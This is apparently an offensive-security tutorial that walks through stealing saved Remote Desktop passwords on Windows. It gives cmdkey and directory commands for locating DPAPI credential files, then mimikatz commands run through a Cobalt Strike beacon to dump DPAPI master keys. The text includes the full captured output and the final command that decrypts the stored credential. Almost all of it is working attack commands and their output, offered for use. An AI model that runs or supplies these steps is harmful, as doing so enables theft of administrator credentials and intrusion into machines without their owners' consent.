Usage conditions: When using mstsc to connect, the administrator has selected the option to automatically save the password connection.
# Suspiciously check if the credentials are saved using cmdkey /list
>cmdkey /list
- Find local Credentials
dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
- mimikatz
beacon> mimikatz dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\A1AB82F3D34D455BC2EA963AE7B14B85
Obtain guidMasterKey {877c4ae6-d114-4851-b9ab-c8d23c7f09a6}
- Use sekurlsa::dpapi
beacon> mimikatz sekurlsa::dpapi
[*] Tasked beacon to run mimikatz's sekurlsa::dpapi command
[+] host called home, sent: 788081 bytes
[+] received output:
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : WIN-BVVD8VFVMPR$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 2022/6/20 12:24:39
SID : S-1-5-20
Authentication Id : 0 ; 283117 (00000000:000451ed)
Session : Interactive from 1
User Name : Administrator
Domain : WIN-BVVD8VFVMPR
Logon Server : WIN-BVVD8VFVMPR
Logon Time : 2022/6/20 12:24:48
SID : S-1-5-21-2815261350-2957312007-627930173-500
[00000000]
* GUID : {877c4ae6-d114-4851-b9ab-c8d23c7f09a6}
* Time : 2022/6/25 13:14:36
* MasterKey : 7ee7b210867c0bb32fe4414c0c56909f1716ec3b40eb2db824aa317701f87a3bae1df728cb513f7f94e34ad50df6915578464ac708ad7c96a30aa3d96dfcc3c0
* sha1(key) : d90d81651dc81f37b34698ac101cf04c094c0cde
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2022/6/20 12:24:39
SID : S-1-5-19
Authentication Id : 0 ; 46503 (00000000:0000b5a7)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2022/6/20 12:24:39
SID :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : WIN-BVVD8VFVMPR$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 2022/6/20 12:24:39
SID : S-1-5-18
[00000000]
* GUID : {62dbbb7e-3978-4e4a-bdd4-65a7fa11a0ce}
* Time : 2022/6/25 12:58:55
* MasterKey : 54ef76dfc016a1471d59ce8d179ba455a201ca749ace616058b6ef0b8573e558cedb185d57d0bc1be40238da47d16a1124f3a69bbaccaf5f5b2e61bd637e9b73
* sha1(key) : 6aff948e5a90e41f2edffd26da163af4f146b1a5
[00000001]
* GUID : {43ea2159-28dc-4507-90bd-751f19e7db5d}
* Time : 2022/6/20 12:24:39
* MasterKey : cc412391998e555e76bfa10964c792fd675b037dec9c5be3b9456db4f5eb64022c0698d6960de4c0a8aca21586f5b445bf490c4a392014721636be5c5f75a3f8
* sha1(key) : 56b3c08a69e9c1a346e35fa4cb572b70cf5a158e
[00000002]
* GUID : {0fefdf3f-162a-4a3f-a6df-6ec2dee82eb5}
* Time : 2022/6/25 12:58:55
* MasterKey : 89012fd9de4903051a9b99225216df633efd8d1e014624f0a68670432da8fc1fda98babc447d5de1d3fe10069a6358be9a64fb1f634cf6012307465455757369
* sha1(key) : 3604ef0e99dab0ea49db307fd8950b8fd0d4d310
[00000003]
* GUID : {3d58f13e-ba7c-4457-835c-5a7f1353590c}
* Time : 2022/6/25 13:12:50
* MasterKey : c12ff664090f806ae980d32bfe19af5ba76f3d5f1dcad46e70da7affaede04c02ba00d5d75380fd4bd77f6cd535be3eec103f2f5048ceee96d61347e3d24d7ba
* sha1(key) : be0643a97d988adcc8e5ae2b3d6df9702df32dc0
Find the masterkey based on guidMasterKey {877c4ae6-d114-4851-b9ab-c8d23c7f09a6}
MasterKey:
7ee7b210867c0bb32fe4414c0c56909f1716ec3b40eb2db824aa317701f87a3bae1df728cb513f7f94e34ad50df6915578464ac708ad7c96a30aa3d96dfcc3c0
- Decrypt
mimikatz dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\A1AB82F3D34D455BC2EA963AE7B14B85 /masterkey:7ee7b210867c0bb32fe4414c0c56909f1716ec3b40eb2db824aa317701f87a3bae1df728cb513f7f94e34ad50df6915578464ac708ad7c96a30aa3d96dfcc3c0
The cs taowu plugin also has a module that can achieve the same effect, obtaining the password of the remote desktop connection record.